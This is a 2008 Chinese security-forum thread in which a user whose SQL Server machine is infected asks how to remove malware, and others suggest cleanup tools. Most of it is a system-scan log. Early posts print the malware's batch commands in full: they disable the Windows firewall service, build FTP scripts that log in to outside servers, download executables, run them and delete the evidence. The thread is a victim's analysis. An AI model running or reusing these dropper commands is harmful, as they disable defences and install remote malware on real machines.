瑞星卡卡安全论坛
1234567i - 2008-9-2 10:54:00
最近老是发现自动增加很多cmd进程,它们也不增加系统资源,但是杀死这个进程后不久又会自动添加上来。通过跟踪和观察发现这些cmd进程sqlserver进程生成的。这些cmd进程执行如下两个批处理代码
第一个:
"C:\WINDOWS\system32\cmd.exe" /c net1 stop sharedaccess
&echo open 61.160.212.45>dboy.sys
&echo wunai>>dboy.sys
&echo wunai$>>dboy.sys
&echo get ver.exe C:\boots.exe>>dboy.sys
&echo bye>>dboy.sys
&echo ftp -s:dboy.sys>dboy.bat
&echo copy C:\boots.exeC:\WINDOWS\system32\inf\test.exe
&echo start start /high "" C:\WINDOWS\system32\inf\test.exe
&echo start C:\boots.exe>>dboy.bat
&echo start C:\boots.exe>>dboy.bat
&echo del dboy.sys>>dboy.bat
&echo del %0>>dboy.bat&dboy.bat
第二个
"C:\WINDOWS\system32\cmd.exe" /c sc stop sharedaccess
&echo open ddosboy1.3322.org >dboy1.sys
&echo dboy>>dboy1.sys
&echo if>>dboy1.sys
&echo get dboy1.exe C:\Windows\tcpsrv1.exe>>dboy1.sys
&echo bye>>dboy1.sys&echo ftp -s:dboy1.sys>system1.bat
&echo start C:\Windows\tcpsrv1.exe>>system1.bat
&echo start C:\Windows\tcpsrv1.exe>>system1.bat
&echo del dboy1.sys>>system1.bat&echo del %0>>system1.bat
&system1.bat
这很明显是病毒通过cmd批处理调用dboy.sys。
经查系统system32下有dboy.sys和dboy1.sys,另外还有一个dboy.bat
这两个文件的代码如下
第一个:
open 218.61.11.180
12369
14789
get wm.exe C:\boots.exe
bye
第二个:
open ddosboy1.3322.org
dboy
if
get dboy1.exe C:\Windows\tcpsrv1.exe
bye
第三个bat文件
ftp -s:dboy.sys
start C:\boots.exe
start C:\boots.exe
del dboy.sys
del %0
然后c盘根目录拷贝boots.exe到c:\WINDOWS\system32\inf\test.exe
然后运行这个test.exe文件
在上面代码中提到的这些文件test.exe、boots.exe、tcpsrv1.exe、system1.bat都没有发现。
我分析可能是病毒在copy过程中被杀毒软件阻止,然后上述这些文件就没有生成,但是执行copy任务的批处理cmd却滞留在了进程中。
所以我可以在进程中发现他们的踪迹。
但是如何把这些讨厌的病毒赶尽杀绝呢?sqlserver肯定是不能删除的,那样工程就搞大了。不知道哪位大侠有什么其他高招呢?谢谢先咯。
用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1; MAXTHON 2.0)
Frank3160449 - 2008-9-2 11:26:00
分析这么多???好像很厉害似的。。可我也中过啊。。好像是木马群???,也可能不是,不过挺好弄的,我弄好过。。。用X-delbox和冰刃强删,还有你发个日志,自己看看杀毒软件还能不能用。还有你说找不到文件是因为那些是安装程序,不是杀毒软件阻止了,它们自动删除了,用WINDOWS恶意软件清理助手扫一遍,杀不了的用强删软件。
1234567i - 2008-9-2 17:38:00
谢谢楼上的回复。
瑞星软件正常,可以运行,也可以查杀其他的病毒。唯独这个杀不死。
找的到的那几个文件都是可以删除的,问题是只要cmd进程一启动,它们又自己生成了。
我观察到,这些cmd进程的父进程是sqlserver。那么病原体应该就是这个sqlserver。问题是我不想也不能把sqlserver删除。
恼火啊。。。。。
1234567i - 2008-9-2 18:09:00
我算弄明白这个病毒是怎么回事哦
cmd执行的批处理实际上是把登录ftp的代码写入一个*.sys文件。
open 203.171.227.191
111
111
get pc.exe C:\tmd.exe
bye
ta
然后将登陆指令写入一个*.bat文件。
ftp -s:tencent.sys
start C:\tmd.exe
start C:\tmd.exe
del tencent.sys
del %0
最后执行这个bat文件登录到f它的ftp服务器,
通过get pc.exe C:\tmd.exe这条指令上传。
继续研究中。。。。
1234567i - 2008-9-2 18:25:00
del %0指令
批处理文件用于删除自己
Frank3160449 - 2008-9-2 20:41:00
似乎很麻烦,sqlsever我也不知道是什么(我也就一般般,算不上高手),仔细检查下,是不是病毒替换了,或者。DLL进程插入?
上传个日志吧。。。。我只知道这个病毒删除文件是用来清理痕迹的,呵呵
happysunday2003 - 2008-9-2 20:51:00
属于批处理
1234567i - 2008-9-2 22:05:00
好吧,我就扫描一个日志上来。不过我不是很懂sreng
像上面提示的
API HOOK
入口点错误:CreateProcessA (危险等级: 高, 被下面模块所HOOK: 0x00FF3DA5)
入口点错误:CreateProcessW (危险等级: 高, 被下面模块所HOOK: 0x00FF3E8D)
什么意思?怎么处理?
1234567i - 2008-9-2 22:06:00
[CODE]
2008-09-02,22:02:21
System Repair Engineer 2.5.16.900
Smallfrogs (
http://www.KZTechs.com)
Windows XP Professional Service Pack 3 (Build 2600) -
以下内容被选中:
所有的启动项目(包括注册表、启动文件夹、服务等)
浏览器加载项
正在运行的进程(包括进程模块信息)
文件关联
Winsock 提供者
Autorun.inf
HOSTS 文件
进程特权扫描
启动项目
注册表
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
<ctfmon.exe><C:\WINDOWS\system32\ctfmon.exe> [(Verified)Microsoft Windows Component Publisher]
<DAEMON Tools Lite><"C:\Program Files\DAEMON Tools Lite\daemon.exe" -autorun> [(Verified)DAEMON Tools Code Signing Services]
<H/PC Connection Agent><"C:\Program Files\Microsoft ActiveSync\wcescomm.exe"> [(Verified)Microsoft Corporation]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<HControl><C:\WINDOWS\ATK0100\HControl.exe> [(Verified)Microsoft Windows Component Publisher]
<RavTask><"C:\Program Files\Rising\Rav\RavTask.exe" -system> [(Verified)Beijing Rising Information Technology Corporation Limited]
<NvCplDaemon><RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup> [(Verified)Microsoft Windows Hardware Compatibility Publisher]
<360Safetray><C:\Program Files\360safe\safemon\360tray.exe /start> [(Verified)Microsoft Windows Component Publisher]
<SynTPEnh><C:\Program Files\Synaptics\SynTP\SynTPEnh.exe> [(Verified)Microsoft Windows Hardware Compatibility Publisher]
<360Safebox><"C:\Program Files\360Safebox\safeboxTray.exe" /r> [(Verified)Qizhi Software (beijing) Co. Ltd]
<Wireless Console 2><"C:\Program Files\Wireless Console 2\wcourier.exe"> []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
<shell><EXPLORER.EXE> [(Verified)Microsoft Windows Component Publisher]
<UIHost><logonui.exe> [(Verified)Microsoft Windows Component Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
<{32CD708B-60A7-4C00-9377-D73EAA495F0F}><C:\WINDOWS\system32\RavExt.dll> [(Verified)Beijing Rising Information Technology Corporation Limited]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
<WPDShServiceObj><C:\WINDOWS\system32\WPDShServiceObj.dll> [(Verified)Microsoft Windows Component Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\OneCard]
<WinlogonNotify: OneCard><C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ASWLNPkg.dll> [Cognizance Corporation]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\<{12d0ed0d-0ee0-4f90-8827-78cefb8f4988}]
<IE7 Uninstall Stub><C:\WINDOWS\system32\ieudinit.exe> [(Verified)Microsoft Windows Component Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{881dd1c5-3dcf-431b-b061-f3f88e8be88a}]
<Outlook Express><%systemroot%\system32\shmgrate.exe OCInstallUserConfigOE> [N/A]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}]
<Themes Setup><%SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll> [N/A]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}]
<Microsoft Outlook Express 6><"%ProgramFiles%\Outlook Express\setup50.exe" /APP:OE /CALLER:WINNT /user /install> [N/A]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{44BBA842-CC51-11CF-AAFA-00AA00B6015B}]
<NetMeeting 3.01><rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\msnetmtg.inf,NetMtg.Install.PerUser.NT> [(Verified)Microsoft Windows Component Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}]
<Microsoft Windows Media Player><rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\wmp11.inf,PerUserStub> [(Verified)DAEMON Tools Code Signing Services]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{7790769C-0471-11d2-AF11-00C04FA35D02}]
<通讯簿 6><"%ProgramFiles%\Outlook Express\setup50.exe" /APP:WAB /CALLER:WINNT /user /install> [N/A]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}]
<N/A><C:\WINDOWS\system32\Rundll32.exe C:\WINDOWS\system32\mscories.dll,Install> [Microsoft Corporation]
==================================
启动文件夹
[Bluetooth Manager]
<C:\Documents and Settings\All Users\「开始」菜单\程序\启动\Bluetooth Manager.lnk --> C:\PROGRA~1\Toshiba\BLUETO~1\TOSBTM~1.EXE [TOSHIBA CORPORATION.]><N>
==================================
服务
[登录会话中介器 / ASBroker][Running/Auto Start]
<C:\WINDOWS\System32\svchost.exe -k Cognizance-->C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ASWLNPkg.dll><Cognizance Corporation>
[本地信道 / ASChannel][Running/Auto Start]
<C:\WINDOWS\System32\svchost.exe -k Cognizance-->C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\AsChnl.dll><Cognizance Corporation>
[Contrl Center of Storm Media / ccosm][Stopped/Disabled]
<D:\Program Files\多媒体\StormII\stormliv.exe /asservice><北京暴风网际科技有限公司>
[Human Interface Device Access / HidServ][Stopped/Disabled]
<C:\WINDOWS\System32\svchost.exe -k netsvcs-->%SystemRoot%\System32\hidserv.dll><N/A>
[lobvir / lobvir][Stopped/Auto Start]
<C:\WINDOWS\system32\svchost.exe -k lobvir-->%SystemRoot%\System32\gedoex.dll><N/A>
[lqqqxd / lqqqxd][Stopped/Auto Start]
<C:\WINDOWS\system32\svchost.exe -k lqqqxd-->%SystemRoot%\System32\gdxecu.dll><N/A>
[Windows Media Center. / McxSvc.][Stopped/Disabled]
<C:\WINDOWS\system32\Slvce1.exe><N/A>
[Windows Media Center.. / McxSvc..][Stopped/Disabled]
<C:\WINDOWS\system32\Slvce2.exe><N/A>
[Windows Media Centerq / McxSvcq][Stopped/Disabled]
<C:\WINDOWS\system32\Slvcexq.exe><N/A>
[MSSQLSERVER / MSSQLSERVER][Running/Auto Start]
<C:\PROGRA~1\MICROS~2\MSSQL\binn\sqlservr.exe><Microsoft Corporation>
[NVIDIA Display Driver Service / NVSvc][Running/Auto Start]
<C:\WINDOWS\system32\nvsvc32.exe><NVIDIA Corporation>
[WinHTTP Proxy Service / ProxySvc][Stopped/Disabled]
<C:\WINDOWS\system32\EsEnt\smss.exe><N/A>
[Rising Proxy Service / RfwProxySrv][Running/Auto Start]
<C:\Program Files\Rising\Rfw\rfwProxy.exe><Beijing Rising Information Technology Co., Ltd.>
[Rising Personal Firewall Service / RfwService][Running/Auto Start]
<C:\Program Files\Rising\Rfw\rfwsrv.exe><Beijing Rising Information Technology Co., Ltd.>
[Rising Process Communication Center / RsCCenter][Running/Auto Start]
<"C:\Program Files\Rising\Rav\CCenter.exe"><Beijing Rising Information Technology Co., Ltd.>
[Rising RealTime Monitor / RsRavMon][Stopped/Auto Start]
<"C:\PROGRAM FILES\RISING\RAV\Ravmond.exe"><Beijing Rising Information Technology Co., Ltd.>
[SQLSERVERAGENT / SQLSERVERAGENT][Running/Auto Start]
<C:\Program Files\Microsoft SQL Server\MSSQL\binn\sqlagent.exe -i MSSQLSERVER><Microsoft Corporation>
[Syntek AVStream USB2.0 WebCam Service / StkSSrv][Stopped/Disabled]
<C:\WINDOWS\System32\StkCSrv.exe><Syntek America Inc.>
[TOSHIBA Bluetooth Service / TOSHIBA Bluetooth Service][Running/Auto Start]
<C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosBtSrv.exe><TOSHIBA CORPORATION>
==================================
驱动程序
[AuthenTec TruePrint USB Driver (SwipeSensor) / ATSWPDRV][Running/Manual Start]
<system32\DRIVERS\ATSwpDrv.sys><AuthenTec, Inc.>
[Microsoft 用于 High Definition Audio 的 UAA 总线驱动程序 / HDAudBus][Running/Manual Start]
<system32\DRIVERS\HDAudBus.sys><Windows (R) Server 2003 DDK provider>
[HookCont / HookCont][Running/System Start]
<\SystemRoot\system32\drivers\HookCont.sys><Beijing Rising Information Technology Co., Ltd.>
[HookNtos / HookNtos][Running/System Start]
<\SystemRoot\system32\drivers\HookNtos.sys><Beijing Rising Information Technology Co., Ltd.>
[HookReg / HookReg][Running/System Start]
<\SystemRoot\system32\drivers\HookReg.sys><Beijing Rising Information Technology Co., Ltd.>
[HookSys / HookSys][Running/System Start]
<\SystemRoot\system32\drivers\HookSys.sys><Beijing Rising Information Technology Co., Ltd.>
[HookUrl / HookUrl][Running/Auto Start]
<\??\C:\Program Files\Rising\Rfw\HookUrl.sys><Beijing Rising Information Technology Co., Ltd.>
[Service for Realtek HD Audio (WDM) / IntcAzAudAddService][Running/Manual Start]
<system32\drivers\RtkHDAud.sys><Realtek Semiconductor Corp.>
[ItSDisk / ItSDisk][Running/System Start]
<System32\Drivers\ItSDisk.sys><Cognizance Corporation>
[ATK0100 ACPI UTILITY / MTsensor][Running/Manual Start]
<system32\DRIVERS\ATKACPI.sys><>
[用于 Windows XP 32 Bit 版的英特尔(R) PRO/无线 3945ABG 适配器驱动程序 / NETw3x32][Running/Manual Start]
<system32\DRIVERS\NETw3x32.sys><Intel? Corporation>
[npkcrypt / npkcrypt][Stopped/Auto Start]
<\??\D:\Program Files\网络\qq\npkcrypt.sys><N/A>
[nv / nv][Running/Manual Start]
<system32\DRIVERS\nv4_mini.sys><NVIDIA Corporation>
[Direct Parallel Link Driver / Ptilink][Running/Manual Start]
<system32\DRIVERS\ptilink.sys><Parallel Technologies, Inc.>
[PxHelp20 / PxHelp20][Running/Boot Start]
<\SystemRoot\System32\Drivers\PxHelp20.sys><Sonic Solutions>
[Rising Rfwbase Driver / RfwBase][Running/Auto Start]
<System32\DRIVERS\rfwbase.SYS><Beijing Rising Information Technology Co., Ltd.>
[RsFwDrv / RsFwDrv][Running/System Start]
<\??\C:\Program Files\Rising\Rfw\RsFwDrv.sys><Beijing Rising Information Technology Co., Ltd.>
[RsNTGDI / RsNTGDI][Running/Boot Start]
<\SystemRoot\system32\Drivers\RsNTGdi.sys><Beijing Rising Information Technology Co., Ltd.>
[Realtek 8169 NT Driver / RTL8169][Stopped/Manual Start]
<system32\DRIVERS\Rtlh86.sys><Realtek Corporation>
[Realtek 10/100/1000 PCI-E NIC Family NDIS XP Driver / RTLE8023xp][Running/Manual Start]
<system32\DRIVERS\Rtenicxp.sys><Realtek Semiconductor Corporation>
[SafeBoxKrnl / SafeBoxKrnl][Running/System Start]
<\??\C:\Program Files\360Safebox\SafeBoxKrnl.sys><360安全中心>
[Secdrv / Secdrv][Stopped/Manual Start]
<system32\DRIVERS\secdrv.sys><Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.>
[smserial / smserial][Running/Manual Start]
<system32\DRIVERS\smserial.sys><Motorola Inc.>
[sptd / sptd][Running/Boot Start]
<\SystemRoot\System32\Drivers\sptd.sys><N/A>
[Syntek AVStream USB2.0 1.3M WebCam / StkCMini][Running/Manual Start]
<System32\Drivers\StkCMini.sys><Syntek>
[Synaptics TouchPad Driver / SynTP][Running/Manual Start]
<system32\DRIVERS\SynTP.sys><Synaptics, Inc.>
[Bluetooth COM Port / tosporte][Running/Manual Start]
<system32\DRIVERS\tosporte.sys><TOSHIBA Corporation>
[Bluetooth RFBUS / Tosrfbd][Stopped/Manual Start]
<system32\DRIVERS\tosrfbd.sys><TOSHIBA CORPORATION>
[Bluetooth RFBNEP / tosrfbnp][Stopped/Manual Start]
<System32\Drivers\tosrfbnp.sys><TOSHIBA Corporation>
[Bluetooth RFCOMM / Tosrfcom][Running/System Start]
<System32\Drivers\tosrfcom.sys><TOSHIBA Corporation>
[Bluetooth RFHID / Tosrfhid][Stopped/Manual Start]
<system32\DRIVERS\Tosrfhid.sys><TOSHIBA Corporation.>
[Bluetooth Personal Area Network / tosrfnds][Stopped/Manual Start]
<system32\DRIVERS\tosrfnds.sys><TOSHIBA Corporation.>
[Bluetooth Audio / TosRfSnd][Stopped/Manual Start]
<system32\drivers\tosrfsnd.sys><TOSHIBA Corporation>
[Bluetooth USB Controller / tosrfusb][Stopped/Manual Start]
<system32\DRIVERS\tosrfusb.sys><TOSHIBA CORPORATION>
[World Standard Teletext Codec / WSTCODEC][Stopped/Manual Start]
<system32\DRIVERS\WSTCODEC.SYS><Microsoft Corporation>
1234567i - 2008-9-2 22:06:00
==================================
浏览器加载项
[ThunderAtOnce Class]
{01443AEC-0FD1-40fd-9C87-E93D1494C233} <D:\Program Files\网络\迅雷5\ComDlls\TDAtOnce_Now.dll, Thunder Networking Technologies,LTD>
[Adobe PDF Reader Link Helper]
{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} <C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll, Adobe Systems Incorporated>
[Thunder Browser Helper]
{889D2FEB-5411-4565-8998-1DD2C5261283} <D:\Program Files\网络\迅雷5\ComDlls\xunleiBHO_Now.dll, Thunder Networking Technologies,LTD>
[SafeMon Class]
{B69F34DD-F0F9-42DC-9EDD-957187DA688D} <C:\Program Files\360safe\safemon\safemon.dll, 360.CN>
[ASUS Security Protect Manager]
{DF21F1DB-80C6-11D3-9483-B03D0EC10000} <C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItIEAddIn.dll, Bioscrypt Inc.>
[启动迅雷5]
{09BA8F6D-CB54-424B-839C-C2A6C8E6B436} <D:\Program Files\网络\迅雷5\Thunder.exe, Thunder Networking Technologies,LTD>
[Edit with Altova X&MLSpy]
{2222EF56-F49E-4d07-A14E-8D2B08766958} <, N/A>
[Create Mobile Favorite]
{2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} <C:\PROGRA~1\MICROS~3\INetRepl.dll, Microsoft Corporation>
[Create Mobile Favorite]
{2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} <C:\PROGRA~1\MICROS~3\INetRepl.dll, Microsoft Corporation>
[信息检索(&R)]
{92780B25-18CC-41C8-B9BE-3C9C571A8263} <C:\PROGRA~1\MI1933~1\OFFICE11\REFIEBAR.DLL, Microsoft Corporation>
[Submit Class]
{A3CD7F74-93C9-4BC4-B892-CCDF1514F714} <C:\WINDOWS\Downloaded Program Files\safeInput4jh.dll, Beijing eChannels Century Technology Co.,Ltd>
[ThunderAtOnce Class]
{01443AEC-0FD1-40FD-9C87-E93D1494C233} <D:\Program Files\网络\迅雷5\ComDlls\TDAtOnce_Now.dll, Thunder Networking Technologies,LTD>
[Adobe PDF Reader Link Helper]
{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} <C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll, Adobe Systems Incorporated>
[GerneralPeerID Class]
{0A47E819-F82E-4D5D-B806-6A9EA94D68CD} <D:\Program Files\网络\迅雷5\Components\InMedia\peerid.dll, >
[PeerDraw Class]
{10072CEC-8CC1-11D1-986E-00A0C955B42E} <%CommonProgramFiles%\Microsoft Shared\VGX\vgx.dll, N/A>
[ASUS Security Protect Manager User e-Wallet]
{1009C944-97D5-44A9-9E32-DFF54F498968} <C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ASWallet.dll, Bioscrypt Inc.>
[Windows Media Player]
{22D6F312-B0F6-11D0-94AB-0080C74C7E95} <C:\WINDOWS\system32\wmpdxm.dll, Microsoft Corporation>
[XML DOM Document]
{2933BF90-7B36-11D2-B20E-00C04F983E60} <C:\WINDOWS\system32\msxml3.dll, Microsoft Corporation>
[Thunder Agent Class]
{485463B7-8FB2-4B3B-B29B-8B919B0EACCE} <D:\Program Files\网络\迅雷5\ComDlls\ThunderAgent_Now.dll, Thunder Networking Technologies,LTD>
[HHCtrl Object]
{52A2AAAE-085D-4187-97EA-8C30DB990436} <C:\WINDOWS\system32\hhctrl.ocx, Microsoft Corporation>
[XMP Class]
{6483F145-A768-4C41-AACC-52D4D7845851} <C:\Documents and Settings\All Users\Application Data\Thunder Network\KanKan\xplayer.dll_1_work, >
[XDRM]
{693571CB-54A3-4E90-9D52-EEAE1334E2D3} <C:\Documents and Settings\All Users\Application Data\Thunder Network\KanKan\xdrm.dll_1_work, >
[StormPlayer Object]
{6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB} <D:\Program Files\多媒体\StormII\mps.dll, 北京暴风网际科技有限公司>
[Windows Media Player]
{6BF52A52-394A-11D3-B153-00C04F79FAA6} <C:\WINDOWS\system32\wmp.dll, Microsoft Corporation>
[MediaComm Class]
{7670648D-461B-42AF-BDFE-46D26AF5EFF2} <D:\Program Files\网络\迅雷5\Components\InMedia\MediaAddin17.dll, Thunder Networking Technologies,LTD>
[360SafeLive]
{87515F61-A66C-4319-A0E0-D416CB8059E3} <C:\Program Files\360safe\live.dll, 360.cn>
[Microsoft Web Browser]
{8856F961-340A-11D0-A96B-00C04FD705A2} <C:\WINDOWS\system32\ieframe.dll, Microsoft Corporation>
[Thunder Browser Helper]
{889D2FEB-5411-4565-8998-1DD2C5261283} <D:\Program Files\网络\迅雷5\ComDlls\xunleiBHO_Now.dll, Thunder Networking Technologies,LTD>
[XML DOM 文档 5.0]
{88D969E5-F192-11D4-A65F-0040963251E5} <C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSXML5.DLL, Microsoft Corporation>
[RMGetLicense Class]
{A9FC132B-096D-460B-B7D5-1DB0FAE0C062} <C:\WINDOWS\system32\msnetobj.dll, Microsoft Corporation>
[DapCtrl Class]
{ACACC6EB-1FBA-4E13-A729-53AEB2DF54F8} <C:\Program Files\Common Files\Thunder Network\KanKan\DapCtrl.2.1.5803.60.(267).dll, ShenZhen Thunder Networking Technologies Ltd.>
[SafeMon Class]
{B69F34DD-F0F9-42DC-9EDD-957187DA688D} <C:\Program Files\360safe\safemon\safemon.dll, 360.CN>
[RDS.DataSpace]
{BD96C556-65A3-11D0-983A-00C04FC29E36} <C:\Program Files\Common Files\System\msadc\msadco.dll, Microsoft Corporation>
[QQPlayerSvr Proxy Control]
{CD108273-D434-43E6-AA90-1469F97EB398} <D:\Program Files\网络\QQ\QzoneMusic.dll, 腾讯科技>
[AUDIO__MP3 Moniker Class]
{CD3AFA76-B84F-48F0-9393-7EDC34128127} <C:\WINDOWS\system32\wmp.dll, Microsoft Corporation>
[AUDIO__WAV Moniker Class]
{CD3AFA7B-B84F-48F0-9393-7EDC34128127} <C:\WINDOWS\system32\wmp.dll, Microsoft Corporation>
[VIDEO__X_MS_WMV Moniker Class]
{CD3AFA94-B84F-48F0-9393-7EDC34128127} <C:\WINDOWS\system32\wmp.dll, Microsoft Corporation>
[Shockwave Flash Object]
{D27CDB6E-AE6D-11CF-96B8-444553540000} <C:\WINDOWS\system32\Macromed\Flash\Flash9f.ocx, Adobe Systems, Inc.>
[ASUS Security Protect Manager]
{DF21F1DB-80C6-11D3-9483-B03D0EC10000} <C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItIEAddIn.dll, Bioscrypt Inc.>
[XML HTTP Request]
{ED8C108E-4349-11D2-91A4-00C04F7969E8} <C:\WINDOWS\system32\msxml3.dll, Microsoft Corporation>
[Thunder DapPlayer]
{EEDD6FF9-13DE-496B-9A1C-D78B3215E266} <D:\Program Files\网络\迅雷5\Components\DownAndPlay\DapPlayer3.0.5712.71.267.dll, ShenZhen Thunder Networking Technologies Ltd.>
[XPPlayer Class]
{F3E70CEA-956E-49CC-B444-73AFE593AD7F} <C:\Program Files\Common Files\Thunder Network\KanKan\PPlayer.2.0.0.181.(267).dll, Xunlei Networking Technologies,LTD>
[XML DOM Document 3.0]
{F5078F32-C551-11D3-89B9-0000F81FE221} <C:\WINDOWS\system32\msxml3.dll, Microsoft Corporation>
[XML HTTP]
{F6D90F16-9C73-11D3-B32E-00C04F990BB4} <C:\WINDOWS\system32\msxml3.dll, Microsoft Corporation>
[Edit with Altova X&MLSpy]
<C:\Program Files\Altova\XMLSpy2005\spy.htm, N/A>
[使用迅雷下载]
<D:\Program Files\网络\迅雷5\Program\geturl.htm, N/A>
[使用迅雷下载全部链接]
<D:\Program Files\网络\迅雷5\Program\getallurl.htm, N/A>
[导出到 Microsoft Office Excel(&X)]
<res://D:\PROGRA~1\MICROS~1\OFFICE11\EXCEL.EXE/3000, N/A>
[查看当前站点排名]
<
http://alexa.chinaz.com/alexa.htm, N/A>
[添加到QQ表情]
<D:\Program Files\网络\QQ\AddEmotion.htm, N/A>
1234567i - 2008-9-2 22:08:00
继续
1234567i - 2008-9-2 22:09:00
==================================
正在运行的进程
[PID: 536 / SYSTEM][\SystemRoot\System32\smss.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2111)]
[PID: 596 / SYSTEM][\??\C:\WINDOWS\system32\csrss.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2111)]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[PID: 624 / SYSTEM][\??\C:\WINDOWS\system32\winlogon.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2113)]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ASWLNPkg.dll] [Cognizance Corporation, 2.5.0.077]
[C:\WINDOWS\system32\MSVCR70.dll] [Microsoft Corporation, 7.00.9955.0]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\ItMsg.dll] [Cognizance Corporation, 1.21.0.410]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\TrayIcon.dll] [Cognizance Corporation, 2.5.0.285]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\brand.dll] [ASUSTeK Computer Inc., 1.01.0.014]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\brand.dll] [ASUSTeK Computer Inc., 1.01.0.008]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\ItMsg.dll] [Cognizance Corporation, 1.21.0.413]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\AsChnl.dll] [Cognizance Corporation, 1.27.0.160]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItDAC.dll] [Cognizance Corporation, 1.00.317]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItReports.DLL] [Cognizance Corporation, 1.5.0.046]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\BioAuth.dll] [Cognizance Corporation, 2.5.0.306]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\BioAuth.dll] [Cognizance Corporation, 2.5.0.301]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ASBioAT.dll] [Cognizance Corporation, 2.5.0.083]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItVCClient.dll] [Cognizance Corporation, 2.1.0.182]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\AuthWiz.dll] [Cognizance Corporation, 2.5.0.558]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\AuthWiz.dll] [Cognizance Corporation, 2.5.0.538]
[C:\WINDOWS\system32\msacm32.drv] [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
[PID: 668 / SYSTEM][C:\WINDOWS\system32\services.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2111)]
[C:\WINDOWS\AppPatch\AcAdProc.dll] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2105)]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[PID: 680 / SYSTEM][C:\WINDOWS\system32\lsass.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2113)]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\ASWLNPkg.dll] [Cognizance Corporation, 2.5.0.077]
[C:\WINDOWS\system32\MSVCR70.dll] [Microsoft Corporation, 7.00.9955.0]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\ItMsg.dll] [Cognizance Corporation, 1.21.0.410]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
